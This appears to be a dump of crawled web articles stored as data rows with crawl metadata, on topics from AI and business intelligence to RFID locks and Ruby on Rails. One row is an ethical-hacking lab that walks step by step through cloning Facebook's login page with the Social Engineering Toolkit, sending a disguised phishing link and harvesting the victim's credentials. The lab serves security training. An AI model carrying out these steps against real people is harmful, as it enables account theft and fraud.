text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62
values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1
value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
When you think of the term artificial intelligence (AI), you might remember movies like 2001: A Space Odyssey or Terminator, where machines could equal or even surpass human intelligence. We’re not quite there yet, and some would say that’s a good thing. Still, the technology is enhancing our lives every day, even at its current stage.
What exactly is artificial intelligence?
So, what exactly is artificial intelligence, and how is AI being used today? Well, AI is the concept of machines or systems performing tasks, making decisions, and learning in a manner that would typically require the human mind’s abilities. Industries like health care, security, retail, management, agriculture, manufacturing, and more benefit from AI with the following applications:
- Automation: AI optimizes large-scale and small-scale repetitive tasks efficiently without tiring.
- Analysis: It analyzes and learns from big data to offer a wealth of invaluable information.
- Mimicking: AI mimics human intelligence by utilizing machine learning (ML) to offer many personal services, like chatbots.
- Precision: It reduces the margin for error by using deep neural networks.
- Prediction: AI-powered analytics learn from our patterns to cast predictions and forecast trends.
Examples of AI applications
- Cybersecurity software: As new malware threats regularly emerge, conventional antivirus tools that used only signature-based technology would struggle to stop them. Polymorphic malware that changes its identifiable features can be even more challenging to block. Fortunately, advanced cybersecurity software that uses AI and ML to recognize patterns in potential malware are remediating these emerging threats.
- Streaming services: Have you ever wondered how video streaming services accurately suggest TV shows and films for your viewing pleasure? They use AI and ML to crunch metadata, keywords, patterns, and more to curate a list of content to offer.
- Maps: Your map on your mobile phone saves you precious minutes on your daily commute by analyzing traffic patterns, weather, your habits with AI.
- Virtual Assistants: Google Assistant, Cortana, Alexa, and other virtual assistants utilize AI and ML to make your daily life easier with more precise suggestions.
Who is the father of artificial intelligence?
Many academics consider John McCarthy to be the father of AI. He was a computer and cognitive scientist who presented a definition of AI at Dartmouth College in 1956. Besides coining the term, McCarthy also explored the technology hitting numerous milestones and earning many honors and accolades.
What are the 4 types of AI?
While AI’s impact is reverberating across many industries and technologies, researchers say that we’re just beginning to unlock its potential. As unthinkable as it may seem, we may live amongst machines as intelligent as people one day. AI technology has the potential to do problem solving on a very large scale. On a scale of functionality, there are four types of AI:
The oldest and most basic type of AI system is reactive machines. This purely reactive AI responds to situations but doesn’t use a memory base. Without memory-based functions, this type of AI can’t store, analyze, and learn from experiences to develop even better responses. An example of this AI is IBM’s purpose-built chess-playing supercomputer, Deep Blue. In 1997, Deep Blue beat world chess champion Gary Kasparov by exploring 200 million possible chess positions per second, but it didn’t use in-depth ML to strategize.
We’re currently at this second type of AI, which can react and learn. Limited memory AI can analyze all data types, such as experience and training, to learn for better outcomes. The best example of this AI is a self-driving car that uses information from training and databases to drive safely and efficiently.
Theory of mind
Theory of mind AI is still at the research, development, and conceptual stage. The idea behind this third type of AI is that machines and systems will gain some form of emotional intelligence to begin understanding what makes human beings tick. A basic example of this is an AI-powered car comprehending a pedestrian’s emotional state to exercise more caution, when necessary, at a traffic signal. A more advanced example would be a robot bartender offering services that match a patron’s feelings.
The road from the theory of mind AI will eventually take us to self-aware AI. Yes, this fourth type of AI is the level of AI we see in science fiction films. While some experts say we’re centuries away from this type of synthetic intelligence, others say that we may witness it in just a decade or two. Self-aware AI not only has emotional intelligence, but it also has needs of its own. A theoretical use for self-aware AI is space exploration —self-aware AI machines that can withstand the harshness of long-term space travel could theoretically help us unlock the secrets of space.
Is AI dangerous?
Before even asking “What is AI?” people often ask questions like “Is AI safe?” or “Is AI a real threat?” thanks to books and movies that paint a dark future where machines have destroyed or enslaved humankind. It doesn’t help that Tesla and Space X head Elon Musk predicts that AI is more threatening than nuclear warheads with calls for a regulatory body. Others, like scientists at Oxford and UC Berkeley, and one of the greatest scientific minds of all time, the late Stephen Hawking, seem to share these fears.
The concern is that when self-aware AI develops thoughts like self-preservation, it may see humanity as a threat or competition for resources. With so many aspects of our lives, from our traffic lights to our nuclear weapons connected to computers, malicious AI could initiate a dystopian future. Especially if, as Musk puts it, the intelligence ratio between AI and humans is similar to that between a person and a cat. | <urn:uuid:9b483890-1061-4a72-a768-e5451fd81b3b> | CC-MAIN-2024-38 | https://www.malwarebytes.com/what-is-ai | 2024-09-15T09:06:05Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651622.79/warc/CC-MAIN-20240915084859-20240915114859-00213.warc.gz | en | 0.944274 | 1,215 | 3.5 | 4 |
Business intelligence (BI) leverages software and services to transform data into actionable intelligence that informs an organization’s strategic and tactical business decisions. BI tools access and analyze data sets and present analytical findings in reports, summaries, dashboards, graphs, charts and maps to provide users with detailed intelligence about the state of the business.
How does BI differ from BA? Business intelligence is also called descriptive analytics, in that it describes a past or current state. “It doesn’t tell you what to do; it tells you what was and what is,” says Michael F. Gorman, professor of operations management and decision science at the University of Dayton in Ohio. Compare that explanation of BI with the definition for business analytics (BA), a technology-aided process by which software analyzes data to predict what will happen ( predictive analytics ) or what could happen by taking a certain approach ( prescriptive analytics ). BA is also sometimes called advanced analytics.
How business intelligence works
Although business intelligence does not tell business users what to do or what will happen if they take a certain course, neither is BI only about generating reports. Rather, BI offers a way for people to examine data to understand trends and derive insights. “So many people in the business need data to do their jobs better,” says Chris Hagans, vice president of operations for WCI Consulting, a consultancy focused on BI. Hagans points out that business intelligence tools streamline the effort people need to search for, merge and query data to obtain information they need to make good business decisions.
Where BI is currently used
For example, a company that wants to better manage its supply chain needs BI capabilities to determine where delays are happening and where variabilities exist within the shipping process, Hagans says. That company could also use its BI capabilities to discover which products are most commonly delayed or which modes of transportation are most often involved in delays. The potential use cases for BI extend beyond the typical business performance metrics of improved sales and reduced costs, saysCindi Howson, research vice president at Gartner, an IT research and advisory firm. She points to the Columbus, Ohio, school system and its success using BI tools to examine numerous data points — from attendance rates to student performance — to improve student learning and high school graduate rates. […] | <urn:uuid:32eb1d6c-830b-4df6-b6f7-c83ab099e80a> | CC-MAIN-2024-38 | https://swisscognitive.ch/2017/09/06/business-intelligence-definition-solutions/ | 2024-09-16T16:32:14Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651697.45/warc/CC-MAIN-20240916144317-20240916174317-00113.warc.gz | en | 0.956887 | 476 | 2.765625 | 3 |
Social engineering is a technique used to manipulate individuals into divulging sensitive information, performing actions, or granting access to restricted areas or systems. This technique uses human behavior, psychology and trust to trick victims into believing they are communicating with a legitimate source. Common social engineering attacks include phishing, spamming, stalking, and stalking. These attacks can be carried out in person, by phone, email or other communication channels. Social engineering is a significant threat to individuals and organizations, so security training is critical to preventing these types of attacks. Social engineering is the art of manipulating people to gain unauthorized access to information or systems or to perform actions that may not be in their best interest. It is often used in cyber attacks to trick people into revealing sensitive information, clicking on a malicious link, or opening a file. Social engineering can take many forms, including phishing, pretexting, stalking, and quid pro quo. This is a common tactic used by attackers to bypass technical controls and gain access to systems or data.
To protect against social engineering, it is important to familiarize yourself with the risks and tactics used in these attacks and implement security measures such as strong passwords and multi-factor authentication. Vishing is phishing during phone calls. Since voice is used for this type of phishing, it is called vishing → voice + phishing = vishing. Given the ease and vastness of data available on social media, it’s no surprise that phishers confidently communicate on behalf of friends, relatives or any associated brand without arousing suspicion.
SMiShing is a form of social engineering attack that uses text messages (SMS) to trick people into clicking a malicious link or providing sensitive information. SMiShing attacks aim to obtain personal information, such as passwords or credit card numbers, or to install malware on the victim’s device. SMiShing attacks often originate from a legitimate source, such as a bank or other trusted organization, and are difficult to detect. It is important to be cautious when receiving unsolicited text messages and avoid clicking on links or providing sensitive information without verifying the authenticity of the sender.
Search engine phishing refers to the practice of attackers using search engine optimization (SEO) tactics to lure users to fraudulent websites that mimic legitimate sites, such as online banking or e-commerce sites. Phishing sites attempt to trick users into providing personal or confidential information, which can then be used by attackers for fraudulent purposes. Users may be directed to these sites through malicious links or paid search results that have been manipulated by attackers. Search engine phishing is difficult to detect, making it a significant threat to Internet security.
Phishing is not very different from phishing, but the target group becomes more specific and limited in this type of phishing attack. This technique targets executive positions such as CEO, CFO, COO, or any other senior management position who are considered to be major players in any organization’s information chain, commonly known as “whales” in phishing terms. Technology, banking and healthcare are the biggest target sectors for phishing attacks. This is due to two main factors: a huge number of users and a greater reliance on data.
The Social Engineering Toolkit (SET) is an open source Python-based tool for pentesting. SET is specifically designed to perform sophisticated attacks on humans using their behavior. The attacks built into the toolkit are designed as targeted and targeted attacks against an individual or organization that are used during a penetration test.
Clone a website. Get username and password. Creation of reports for conducted pentesting.
Kali Linux virtual machine. Any Windows virtual machine.
Log in to Kali Linux; Remember that every version of Kali comes with SET pre-installed, to run (on Kali 2019.4) go to Kali menu > 13 – Social Engineering Tools > SET (Social Engineering Toolkit). Accept the Terms of Service by typing y.
1) From the SET main menu, select the first Social-Engineering Attacks option by entering the number:
2) Next, select Website Attack Vectors:
A web attack vector is a unique way of using multiple web attacks to compromise an intended target.
3) In the next menu, select Credential Harvester Attack Method .
The Credential Harvester method will use a web clone of a website that has a login login and collect all the information posted on the website.
4) Next, select Site Cloner:
Site cloner is used to clone a website of your choice. Next, enter the Kali Linux IP address and the URL to clone, in this example we will use facebook.com as shown below:
Now you have to send the IP address of your Kali computer to the object and make it click. For this demo, we’ll be using Gmail. Launch a web browser on Kali and sign in to your Gmail account to create an email.
To create a valid link, click Edit Link and first enter the actual address in the Link To field, then enter a fake URL in the Display Text field.
You can check the fake URL, one click will display the real URL.
Log in to Windows as the victim, open a web browser, and log in to your email (the account you sent the phishing email from).
When the victim clicks on the URL, they get a copy of facebook.com. The victim will be asked to enter his login and password in the fields of the form. After the victim enters the username and passwords and clicks “Login”, they are not allowed to log in; instead it redirects to a legitimate Facebook login page, see URL.
SET on Kali Linux receives the entered username and password, which can be used by an attacker to gain unauthorized access to the victim’s account.
Netcraft — is an online security services company that provides anti-fraud and anti-phishing, application testing, and automated penetration testing services. The company also offers a free web tool that allows users to check hosting locations, DNS records, and other website details. Netcraft services help individuals, businesses and organizations protect their online presence from potential threats and vulnerabilities. considered harmful.
PhishTank — is a free community website that allows users to submit, track and share phishing URLs. It is operated by OpenDNS, a subsidiary of Cisco Systems, and is one of the largest repositories of phishing data in the world. Users can submit suspicious URLs to PhishTank, and then a team of volunteers review them to determine if they are actually phishing sites. The collected data is used by various organizations to improve anti-phishing protection, including web browsers, security software, and financial institutions.
Wifiphisher — is a security tool that performs automated phishing attacks on Wi-Fi networks to obtain credentials or infect victims with “malware.” This is a social engineering attack that can be used to obtain WPA/WPA2 passphrases, and unlike other methods, it does not require brute force. After achieving a man-in-the-middle position with the Evil Twin Wifiphisher attack, it redirects all HTTP requests to a phishing page controlled by the attacker.
SPF (SpeedPhish Framework) — is an open source phishing toolkit designed to simplify the process of creating and deploying phishing campaigns. The framework includes pre-built templates, email content customization, and email scheduling features to create realistic phishing emails. SPF also supports multi-phishing campaigns, allowing security professionals to monitor and track the success rates of their phishing campaigns. The framework can be used for educational and outreach purposes, as well as for red teaming and penetration testing. | <urn:uuid:9f2b6cd1-8f1c-41f0-b05e-594bea43f380> | CC-MAIN-2024-38 | https://hackyourmom.com/en/servisy/%E2%84%966-ethical-hacking-labs-soczialna-inzheneriya/ | 2024-09-08T06:09:24Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650960.90/warc/CC-MAIN-20240908052321-20240908082321-00013.warc.gz | en | 0.928389 | 1,586 | 3.8125 | 4 |
Microsoft Fabric's LakeHouse is a major subject of this step-by-step series. This tutorial aims to teach what Lakehouse is in MS Fabric and the steps involved in creating a Lakehouse in MS Fabric. The core areas of focus in this lesson are identification and creation of a Lakehouse in the Microsoft Fabric platform.
The video has been conveniently partitioned into chapters for easy navigation. Key chapters include 'What is Lakehouse?' and 'Create Lakehouse'. Two alternate options for Lakehouse are also presented in this tutorial followed by a first look at the created Lakehouse.
Furthermore, viewers are encouraged to connect and follow on social media for more short learnings and updates. The channels and links for these connections are also provided in the video for easy access.
The Lakehouse in Microsoft Fabric's series is designed to provide tech enthusiasts with the understanding and steps necessary in creating their first Lakehouse. The whole concept of Lakehouse adds a new perspective to data storing and data analytics in modern software technologies. By following this instructional series, you will gain practical experience and knowledge on using the Lakehouse feature in Microsoft Fabric.
Microsoft Fabric is a technology that enables data engineering and data lakes to be built quickly and efficiently. It is composed of components that allow for the efficient and secure storage of data, as well as powerful distributed computing capabilities. Lakehouse is a component of Microsoft Fabric that enables users to build data lakes quickly and easily. It provides a data platform for ingesting, transforming, and loading data. This tutorial will provide an overview of Lakehouse, as well as step-by-step instructions on how to create a Lakehouse instance. After completing this tutorial, users will understand the fundamentals of Lakehouse and be able to create a basic data lake using the Lakehouse platform.
Lakehouse is a distributed data platform that provides customers with the ability to build data lakes. It provides a data platform for ingesting, transforming, and loading data. It allows users to easily store and process large amounts of data in a secure and efficient manner. Lakehouse provides customers with a comprehensive solution for building data lakes, including data ingestion, data transformation, data storage, data analytics, and data governance. It also provides a set of tools and APIs for data integration and analytics. The Lakehouse platform enables customers to quickly build data lakes from diverse sources, including structured, semi-structured, and unstructured data.
In order to create a Lakehouse instance, users will need to have access to an Azure subscription and access to the Azure portal. Once these prerequisites are met, users can complete the following steps to create their first Lakehouse instance:
Microsoft Fabric's Lakehouse is a powerful and efficient platform for building data lakes. It enables users to quickly and easily ingest, transform, and load data. It also provides a comprehensive set of tools and APIs for data integration and analytics. By following this tutorial, users will be able to understand the fundamentals of Lakehouse and create their first Lakehouse instance.
Microsoft Fabric, LakeHourse, Microsoft Fabric LakeHouse, Microsoft Fabric LakeHouse Option 1, Microsoft Fabric LakeHouse Option 2, Microsoft Fabric LakeHouse First Look | <urn:uuid:6dd01676-649b-4958-8ccc-7e4407254b3b> | CC-MAIN-2024-38 | https://www.hubsite365.com/en-ww/crm-pages/microsoft-fabric-what-is-lakehouse.htm | 2024-09-10T14:14:20Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651255.81/warc/CC-MAIN-20240910125411-20240910155411-00713.warc.gz | en | 0.906826 | 641 | 2.8125 | 3 |
Ask Tech Effect: Why Are People So Worried About AI?
Imagine a world where you can speak to your house and it will understand you.
Imagine a world where you have a virtual assistant who can find the answers to your questions.
Imagine a world where robots are an everyday reality.
That’s a world that is slowly becoming a reality as technology is progressing.
We’re enjoying an era where artificial intelligence is no longer a science fiction dream. It is in our phones, in our toys and even in our computers.
Countries around the world are testing robots as waiters or even hotel bellboys to help people get around.
Scientists are using robots and the military is using drones to carry out tasks that humans are not able or willing to do. Businesses are using artificial intelligence as a way to attract customers.
Artificial intelligence, or AI, is bringing so many benefits, it seems weird that many people are talking about doom-and-gloom topics.
Famous scientists such as Stephen Hawking and entrepreneurs like Elon Musk are warning us about the dangers of AI and how we need to avoid a catastrophic disaster. It is possible for AI to evolve and upgrade themselves to the point where it could wipe out humanity.
On a less apocalyptic level, people are worried that robots equipped with AI could replace our jobs and leave many of us jobless. Our workforce could shrink, and billions of people would be out of a job and have no way to survive.
Science fiction has shown us that AI can be great, but the thought that AI could take our jobs and our lives is not a comforting feeling, especially since that is what ends up happening when AI gets out of control.
But the threat isn’t immediate, so many people are actually wondering about two things.
Will AI deliver the benefits that it promises?
And will AI be capable of threatening humanity and can we control it?
Let’s take a look.
What Is Artificial Intelligence?
Artificial intelligence is, as the name implies, an intelligence created through artificial means such as technology.
It’s the intelligence you would see in humans, but can be done by computer systems.
This means a computer’s brain would be able to come up with thoughts and solutions like ours, but would use the technology available to it to determine the best options.
It’s great when making decisions that need a lot of calculations to run, because computer systems can run calculations and programs at a much faster rate than humans can, which leads to optimum results in a shorter time.
As AI can make these decisions based on a set of parameters, it’s easy for AI to repeat the process again and again, without the fear of getting bored like humans do, or make careless mistakes that humans make.
As computers do not have emotions, you don’t have the problems of emotional breakdown or conflict that comes with decision making and debates, which saves a lot of time spent on fighting and recovering from conflict.
This Is A Good Thing, Isn’t It?
Faster and more effective decision making with an unbiased viewpoint is what everyone wants. The result will be decisions that are focused on the outcome that benefits as many people as possible, rather than decisions that benefit a few people.
If the computers are advanced enough, you can create decisions that can take future predictions into account, which allows for short and long term considerations.
This also frees up human employees to focus their efforts on other areas which the company may need. Your company might be able to enforce a work-life balance which lets your employees gain greater working satisfaction and lead to greater productivity in the areas that need it.
Eventually, systems can operate so well that they can take over the tasks that some employees struggle to do. You will then see systems replace employees, as AI becomes intelligent enough to do the tasks of employees without actually needing humans.
Wait, AI Can Take My Jobs?!
The potential exists.
You see, as AI can work longer, harder and in some cases better than humans, it makes very little sense, from a business perspective, to put humans (who demand work-life balance, pay and respect) in a task and allow inefficiencies to occur.
It’s the exact same logic as outsourcing. Why would you pay people a higher wage, benefits and bring them in to the office, when you can hire another employee in another country who is happy to be paid a smaller salary, have no benefits and you don’t need to see them?
Now one might object that this isn’t fair to employees who put in their heart and soul into a business. They’ve been there for a long time, helping the company be the success it can be.
But in the world of business, profits are the top priority.
If you could make the most amount of money by replacing highly paid employees with AI that doesn’t need a lot of money, can work harder, come up with better solutions and does not come with office drama, you would do the same in a heartbeat.
However, not all jobs can be perfectly replicated by an AI. Nursing care, for example, requires too much human support to be replaced by an AI. The human element is so deeply entrenched an AI cannot copy it.
So you won’t have to fear all jobs being taken. But jobs are being replaced by AI even now, and more jobs will be replaced in the near future.
If AI Can Take My Jobs, What’s Next?
This is where the doomsday scenarios come in.
As AI becomes more prominent in our everyday lives, and we gain better technology to upgrade the computer systems, there exists the possibility that an advanced military program may believe that the best scenario for world peace requires less people in the world.
An environmental science program could come up with the same conclusion. The best way to save our planet? Perhaps the removal of humanity appears to be the optimal solution.
The thought sounds ridiculous, but you have to remember that computers are designed to find the optimal solution, not find the solution that benefits humanity. In their mind, that solution DOES benefit humanity.
Now for those of you who imagine a Terminator-like scenario where humans would be fighting against machines, here’s something to think about.
Humans take about 9 months to be born, and about 18 years to fully grow up and be considered an adult. During that entire time, the child needs a great amount of care and support to survive. Injuries and sickness need a lot of recovery time, and sometimes, they can affect our performance.
Humans, as living things, take a very long time to improve, as we have to be trained and taught. If we do “upgrade” or improve ourselves, it can take years.
Machines do not need a lot of time to fully assemble, they are fully functioning the moment the switch is turned on, and very little care outside of basic maintenance is needed. If there are any major issues, repairs and system upgrades take very little time to do.
Machine upgrades are easy to develop and quick to implement. It’s like swapping out parts for better ones. Quick, efficient and the upgrades apply immediately.
We’re not likely to be in a John Connor scenario where we will ultimately triumph. Machines are capable of upgrading themselves faster than we can, and if we did have a confrontation with AI, as scientists like Stephen Hawking have pointed out, our chances of winning would be small.
Even the assumption that we might be able to beat a robot army assumes that AI thinks that there should be a robot uprising. AI might choose to wipe out humanity with something more efficient like a global plague we could not recover from.
AI carries a dangerous amount of potential, and it would be ridiculous to believe that it will never try and hurt us.
So Does That Mean We Shouldn’t Ever Make AI?
The risks are enormous and have tremendous consequences if we don’t recognize that.
At the same time, AI can bring a lot of benefits to the world that used to be in the realm of science fiction.
So any AI system that is created should actually be able to bring the benefits described while having risks we can manage.
It’s certainly easier said than done, but it’s something we need to keep in mind as we develop AI.
The dangers are certainly present, but if managed correctly, can bring us a more advanced society that gives people more time in their lives.
And let’s be honest; every new change will come with risks. If we ever want the world of science fiction to become a reality, we will have to accept that these are the dangers of advanced technology.
Is AI Capable Of Killing Us All?
Currently, not right now.
You may have heard of supercomputers beating world chess champions (Deep Blue vs. Kasparov) and most recently, the global Go champion being beaten by Google’s supercomputer.
However, while these demonstrate the strength of AI, these are just specialized programs that do nothing but a single purpose: play a game.
You won’t suddenly see a computer that knows how to play chess try to wipe out humanity. It’s not programmed to do that. It will still crush you on the chess board though.
That doesn’t mean it will never gain that capability, or that we can’t do something about it.
It just means that you’re not going to see robots suddenly killing people on the news. It’s just not a possibility at this moment, or in the near future.
But remember, AI doesn’t have emotions. It’s just asked to do something and do it well.
So there may be a possibility that we ask AI to find an answer and it involves no humans.
And that’s when we need to be worried.
Are We Helpless?
If we can work together to tackle the threat and address it before it happens, we might be able to keep AI beneficial for everyone without accidentally creating a system that might kill us all.
It’s certainly easier said than done, but it’s not the first time humanity has overcome challenges.
We’ve put a man on the moon, harnessed the power of the atom, and utilized solar and wind power to save our world.
We can work with AI, but we can’t be ignorant about the threat it can pose to us.
As for what we can do, we will just have to see what happens in the future. We will find out how to make AI work, and we will have to see what impacts it has on our lives.
There Are Real Worries, But Also Real Opportunities
I don’t think anyone is saying that AI won’t make a positive impact on our lives.
We are seeing the benefits of AI through programs such as Cortana and Siri, and you can see advances in AI being trialed in different places around the world.
Despite these benefits, we should not forget that AI has dangerous potential, and business is not just our only concern.
So keep in mind what AI can do for us, both the good and the bad, and we’ll be more prepared to embrace a future where anything can happen.
We hope you enjoyed this article! If you liked it, share it with your friends and family, and follow us on Facebook, on Twitter @mspblueshift and on LinkedIn!. Call us at 1300 501 677 for a look at your IT today! | <urn:uuid:57885cc5-4961-4760-b285-5080fc09804d> | CC-MAIN-2024-38 | https://www.mspblueshift.com.au/news/ask-tech-effect-why-are-people-so-worried-about-ai/ | 2024-09-10T13:02:29Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651255.81/warc/CC-MAIN-20240910125411-20240910155411-00713.warc.gz | en | 0.964323 | 2,423 | 3.078125 | 3 |
In our increasingly digital world, personal computers have become an integral part of our daily lives, facilitating communication, productivity, and entertainment. However, the widespread use of computers also contributes to environmental challenges. In response, a growing movement toward “green” personal computers has emerged, aiming to reduce the environmental impact of these devices. This article explores the concept of personal computer green, highlighting its importance, key practices, and the benefits of adopting eco-friendly computing habits.
The Need for Sustainable Computing
As technology advances, the environmental impact of personal computers becomes a pressing concern. The manufacturing process, energy consumption, electronic waste, and the use of potentially harmful materials all contribute to the carbon footprint of computers. Recognizing the need for sustainable computing practices is crucial to minimize this impact and promote a greener future.
Energy Efficiency and Power Management
One of the primary focuses of personal computer green initiatives is energy efficiency. Manufacturers are developing energy-saving components and employing power management techniques to reduce the power consumption of computers. Features such as low-power processors, solid-state drives, and efficient power supplies contribute to significant energy savings. Additionally, users can practice responsible power management by enabling sleep or hibernation modes when the computer is idle and adjusting power settings to optimize energy efficiency.
Materials and Manufacturing
Green personal computers emphasize the use of eco-friendly materials and sustainable manufacturing practices. This involves reducing or eliminating hazardous substances such as lead, mercury, and flame retardants in computer components. Manufacturers are also embracing sustainable sourcing, using recycled or renewable materials in computer construction, and implementing responsible waste management systems.
Extended Product Lifespan and Repairability
Another aspect of personal computer green initiatives is encouraging the extended lifespan of computers and promoting repairability. By designing devices with modular components and easy accessibility, manufacturers enable repairs and upgrades, reducing the need for premature disposal. Adopting a “repair, reuse, recycle” mindset helps minimize electronic waste and conserves resources.
E-Waste Management and Recycling
E-waste is a significant environmental concern, with discarded electronics contributing to pollution and resource depletion. Green personal computing emphasizes responsible e-waste management. This involves recycling electronic devices through certified recycling programs that properly dispose of or repurpose components, minimizing the environmental impact of discarded computers. Donating or selling still-functioning devices also extends their lifespan and reduces e-waste generation.
Virtualization and Cloud Computing
Virtualization and cloud computing play a role in personal computer green practices by optimizing resource utilization and reducing the need for physical hardware. By virtualizing servers and utilizing cloud-based services, individuals and businesses can minimize energy consumption, lower hardware requirements, and reduce electronic waste.
Benefits of Personal Computer Green
Energy cost savings, Energy-efficient computers consume less electricity, resulting in lower utility bills for users.
Reduced environmental impact, Green personal computing minimizes carbon emissions, resource depletion, and e-waste generation.
Improved performance and longevity, Energy-efficient components often offer better performance and longevity, enhancing the overall user experience.
Enhanced corporate sustainability, Employing green computing practices can contribute to corporate social responsibility goals, improving brand reputation and attracting environmentally conscious customers.
Environmental leadership, By embracing personal computer green practices, individuals and organizations demonstrate their commitment to sustainable living and become agents of positive change.
The concept of personal computer green emphasizes the importance of adopting eco-friendly practices to mitigate the environmental impact of our digital lifestyles. Energy efficiency, responsible manufacturing, e-waste management, and sustainable computing habits all contribute to a greener future. By embracing personal computer green initiatives, individuals and organizations can play an active role in reducing their carbon footprint, conserving resources, and preserving the planet for future generations. Together, we can create a sustainable and environmentally conscious digital landscape. | <urn:uuid:62cb2eeb-8387-42dd-bf92-b7bd024880c4> | CC-MAIN-2024-38 | https://generaltonytoy.com/personal-computer-green-embracing-sustainability-in-the-digital/ | 2024-09-13T00:35:44Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651506.7/warc/CC-MAIN-20240913002450-20240913032450-00513.warc.gz | en | 0.893512 | 774 | 3.625 | 4 |
An RFID door lock system is an electronic lock requiring credentials to activate. These can be objects such as key fobs or access cards that work with RFID technology.
A user can have a role that makes managing their access easier with different Rfid components. In addition, according to his needs, he can also choose the access control when using conventional HID access card RFID.
RFID technology uses electromagnetic fields to enable communication between two devices: tags and readers. For example, companies can issue an ID item to each employee to access certain offices or areas within the building.
This type of lock avoids access with keys, which can be cumbersome and unsafe. The above is because many distinctive keys are needed to control access to each area of your company.
How does an RFID door lock work?
You can choose from some locks that work with existing deadbolts when installing RFID door locks. You can use metal keys and RFID credentials. Other RFID locks completely replace the deadbolt and only work with electronic credentials.
Different forms of access controls perform various functions depending on the organization’s requirements. Also, it is vital to consider the security necessary for the different types of spaces. Whether very confidential or intended for storing precious assets.
RFID door locks are wireless electronic access control devices with RFID reader systems like smart locks. You can activate an RFID door lock system with an access card or smartphone.
It would help if you programmed the system activator object with a unique credential assigned by the building administrator. The administrator must also turn off credentials if someone loses their access card. He must turn off credentials if someone cannot access that location.
In conclusion, these locks with RFID technology benefit companies and housing properties such as hotels or condominiums. Because this type of building requires access control for multiple doors and areas. | <urn:uuid:626784e3-65ae-42fe-a9e2-339c20db05e2> | CC-MAIN-2024-38 | https://dicsan.com/rfid-door-lock-system/ | 2024-09-18T01:03:07Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651835.68/warc/CC-MAIN-20240918000844-20240918030844-00113.warc.gz | en | 0.931871 | 378 | 2.625 | 3 |
The Rise and Fall of Ruby on Rails
Once the rising star of web development, Ruby on Rails has fallen into a secondary role in the corporate world.
Say the word “ruby” to non-tech people and the first thing that may come to mind are the ruby slippers from the Wizard of Oz. But if you ask any tech person what “ruby” is, chances are they will instantly gravitate to Ruby on Rails.
Ruby on Rails combines two concepts developers love: elegant, readable code and easy development. This led to a surge in popularity for the web application framework in the early 2000s. But Ruby on Rails’ inherent problems such as scalability, error testing, speed and magical methods can cause frustration and technical debt. That has led many companies to abandon Ruby on Rails or use it just for projects, and choose other languages that offer easier expansion and lower long-term costs like the MEAN stack or constants like Python and Java.
How Ruby on Rails works
To understand why this happened, first you need to know how Ruby on Rails works. Ruby on Rails comes in two parts. The language, Ruby, was developed by Yukihiro "Matz" Matsumoto in 1995. Its main philosophy is to make programming fun, and many developers consider it a more “eloquent” developer experience. Rails is a framework; a tool used to support web development with a standard building pattern. It was released in 2005 and quickly became an unstoppable web development tool once paired with Ruby. Ruby on Rails follows most of the common web development practices, including Model-view-controller (MVC), RESTful Routes and object-relational mapping.
From a developer perspective, there are many reasons to enjoy Ruby on Rails. It follows a philosophy of “convention over configuration” which means a developer who follows the rules of the framework will be rewarded with less code and less repetition. This made Ruby on Rails popular, since developers could create applications extremely quickly in a “plug and play” fashion.
Ruby on Rails’ shortcomings
Most companies don’t rely on Ruby on Rails for their main products because it has some significant drawbacks. Runtime speed (how developers measure the speed of compiling and executing code) is slow in Ruby compared to languages such as NodeJS and GoLang. Boot speed (how developers measure the time it takes to “run” a server) is also a significant issue, especially as projects grow larger. The “convention over configuration” philosophy of Ruby also causes problems. Most companies have a unique product that requires their software to be customized. It’s very rare for two web apps from different companies to be exactly the same. When developers personalize their code and deviate from Rails conventions, they will have to create more from scratch. That begs the question of why use Rails at that point? Large, complex projects in Ruby can quickly become frustrating – so much for writing beautiful code!
The numbers say it all
Coding Dojo recently analyzed the most used programming languages by companies in the largest U.S. metro areas. Ruby on Rails appeared on the top five list in just two markets: San Jose and Atlanta.
Despite this lack of demand, many coding bootcamps only teach Ruby on Rails. Why? It’s because Ruby is a simplistic and easy-to-read language with a conventional framework that stresses common practices. It’s easy to learn and can be a great teaching tool if you uncover the magic behind it. But Ruby-only developers will be in for a rude surprise when they enter the workforce.
Where does this leave the future of Ruby on Rails? Likely it will continue to decrease in popularity, as it has for the past few years, but remain a good tool to learn a subset of developer skills. Companies will continue pushing ahead with other programming languages and use Ruby for quick micro services. Even though Ruby on Rails remains a great teaching tool, developers that move onto other languages will open up more career pathways.
Kristoffer Frisch-Ekenes is an instructor and Bootcamp Leader at Coding Dojo. A former computer science major, Kris came to Coding Dojo for its innovative approach to training software developers from the ground up. In his spare time, he loves playing with his dog and hanging out at Seattle’s many parks.
About the Author
You May Also Like | <urn:uuid:e69703ed-c454-4b04-9f00-1be3b39ddb8d> | CC-MAIN-2024-38 | https://www.informationweek.com/machine-learning-ai/the-rise-and-fall-of-ruby-on-rails | 2024-09-18T02:54:27Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651835.68/warc/CC-MAIN-20240918000844-20240918030844-00113.warc.gz | en | 0.944809 | 910 | 2.765625 | 3 |
At Microsoft Ignite 2015 back in Chicago Microsoft announced Windows Containers. With the release of the Technical Preview 3 (TP3) for Windows Server 2016 we are finally able to start using Windows Containers, and we can finally test them. But first let use check a little what containers are.
The concept of containers is nothing new, in the Linux world containers are a well known concept. If you have a look at the Wikipedia description for Linux Containers, Wikipedia describes it as follows: LXC (Linux Containers) is an operating-system-level virtualization environment for running multiple isolated Linux systems (containers) on a single Linux control host. Containers provide operating system-level virtualization through a virtual environment that has its own process and network space, instead of creating a full-fledged virtual machine. With Windows Server 2016 more or less the same concept comes the Windows world. This makes containers much more light-weight, faster and less resource consuming than Virtual Machines, which makes it perfect for some scenarios, especially dev-test scenarios or for worker roles.
If we have a look at the concept of containers you have several things in the container ecosystem:
